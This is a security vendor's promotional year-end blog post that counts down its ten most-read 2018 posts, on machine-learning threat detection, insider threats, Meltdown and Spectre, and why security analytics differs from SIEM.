Top 10 Blog Posts of 2018

As we look back at 2018, let’s see which Gurucul blog posts had the most views. This tells us what resonated with you, our audience. Here is the countdown:

10. Detect Host Compromise With “Domains Generated Algorithmically”

Our #MachineLearningMadness blog posts did very well overall. This post on our Domains Generated Algorithmically Machine Learning Model was particularly interesting. The massive number of domains that can be programmatically generated makes it incredibly difficult to prevent host compromise without deploying this model.

9. Webinar: Automating Security Controls Using Models and Security Orchestration

We were very fortunate to have our Aetna customer present their use case for Gurucul Risk Analytics in a live webinar. This post reviewed the content of that webinar where Kurt Lieber, CISO of Aetna, discussed Aetna’s security orchestration program in depth.

8. Stop Fileless Malware With “Abnormal Powershell Command Execution”

Traditional antivirus and anti-malware security software aren’t looking for fileless malware attacks. They aren’t designed to stop this type of attack, so they can’t find them. You need something more and something better. This is why our post about the Gurucul Abnormal PowerShell Command Execution Machine Learning Model made the top 10 list in 2018.

7. A Q&A With Our CEO About Insider Threats

Who doesn’t love a CEO Q&A? And, who isn’t interested in Insider Threats? In this post, Gurucul CEO, Saryu Nayyar, discusses why insider threats are still the biggest cyber security problem for companies today.

6. Identify Outlier Access With “Clustering And K-Means”

It might have been the beautiful image that accompanies this post, but more likely it was the valuable content. The Gurucul Clustering and K-Means Machine Learning Model is essentially table stakes for any security analytics solution.  This powerful model groups data into clusters. In our case, it’s looking at different variables to determine who has access to what — what do you have access to? What should you have access to?

5. Meltdown & Spectre – Nearly Every Computer and Device at Risk

Fear is a powerful motivator, which is why this post drew so much attention. It’s scary to find out almost all computers and mobile devices are vulnerable to the Meltdown and Spectre attacks. Keeping your computer and system patches up-to-date is the best action to elude these sorts of cyberattacks.

4. Announcing the Second Edition of Borderless Behavior Analytics

It’s no surprise the launch of the second edition of our popular book made the top five posts of 2018! The second edition of “Borderless Behavior Analytics” is twice the size of the first edition, and features insights on the future of predictive security analytics from 12 expert contributors.

3. The Rising Need for Automated Risk Response & Security Analytics

This post discusses the ability to automate front line security controls based on risk scores derived from User and Entity Behavior Analytics and Identity Analytics. It’s a powerful study on how our customers are redefining the next generation of security analytics, which goes well beyond what can be done with rules and signatures.

2. When Rules Don’t Apply

Let’s talk about the difference between rules and machine learning. UEBA powered by machine learning applies advanced analytics to all available data captured in an environment. It detects changes in patterns, and new patterns, as they emerge – to be able to detect the unknown unknowns. This is not possible with a simple rules-based solution. Read the full blog post for more on why we need machine learning to catch anomalies whose signatures we don’t have.

1. Security Analytics Is not a SIEM

Drum roll please… the number one most read post of 2018 was: Security Analytics Is not a SIEM! This is great news, because we have been saying this for quite some time. If you haven’t read this post, you should. It shares the key reasons why Security Analytics is not a SIEM. This is especially relevant given that analysts in our space are saying that security analytics products are second generation SIEMs. Well, they’re not, and this post tells you why not.

Thank you for reading our blog in 2018! We hope to see you back here in 2019 for more.